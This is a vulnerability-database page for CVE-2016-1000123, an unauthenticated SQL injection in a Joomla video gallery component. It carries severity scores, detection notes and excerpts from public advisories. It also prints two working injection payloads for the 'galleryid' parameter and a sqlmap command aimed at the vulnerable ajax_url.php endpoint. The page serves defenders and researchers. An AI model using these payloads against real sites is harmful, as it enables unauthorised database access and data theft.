CVE-2016-1000123
published 2016-10-06CVE-2016-1000123: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
PriorityP263critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.63%
88.1th percentile
Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| huge-it | video_gallery | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandpage=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2↗
commandpage=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2↗
- →A high rate of HTTP 500 Internal Server Error responses from the target endpoint during a short window is a strong indicator of active sqlmap-driven exploitation of this vulnerability. ↗
- →The vulnerability is unauthenticated — no session cookie or login is required. Any source IP sending POST data with SQL payloads in 'galleryid' to ajax_url.php should be treated as malicious. ↗
- ·The vulnerable file ajax_url.php is directly web-accessible and bypasses Joomla's normal component routing, meaning standard Joomla access-control checks do not apply to it. ↗
- ·The fix was introduced in v1.1.0; installations still running v1.0.9 of com_videogallerylite remain fully exposed to unauthenticated exploitation. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection
exploitdb·2017-08-31·CVSS 9.8
CVE-2016-1000123 [CRITICAL] Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection
Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection
---
# Exploit Title Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
# Google Dork: [if applicable]
# Date: 2016-09-15
# Exploit Author: Larry W. Cashdollar, @_larry0
# Vendor Homepage: http://huge-it.com/joomla-video-gallery/
# Software Link:
# Version: 1.0.9
# Tested on: Linux
# CVE : CVE-2016-1000123
# Advisory: http://www.vapidlabs.com/advisory.php?v=169
# Exploit:
• $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"
• .
• .
• .
• (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
• sqlmap identified the following injection point(s) with a total of 2870
Exploit-DB
Joomla! Component com_videogallerylite 1.0.9 - SQL Injection
exploitdb·2016-09-22·CVSS 9.8
[CRITICAL] Joomla! Component com_videogallerylite 1.0.9 - SQL Injection
Joomla! Component com_videogallerylite 1.0.9 - SQL Injection
---
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.
Vulnerable Code in : ajax_url.php
11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
28 if($_POST['task']=="load_videos_content"){
29
30 $page = 1;
31
32
33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
34 $
No writeups or analysis indexed.
http://huge-it.com/joomla-video-gallery/http://www.securityfocus.com/bid/93107http://www.vapidlabs.com/advisory.php?v=169https://www.exploit-db.com/exploits/42596/http://huge-it.com/joomla-video-gallery/http://www.securityfocus.com/bid/93107http://www.vapidlabs.com/advisory.php?v=169https://www.exploit-db.com/exploits/42596/
2016-10-06
Published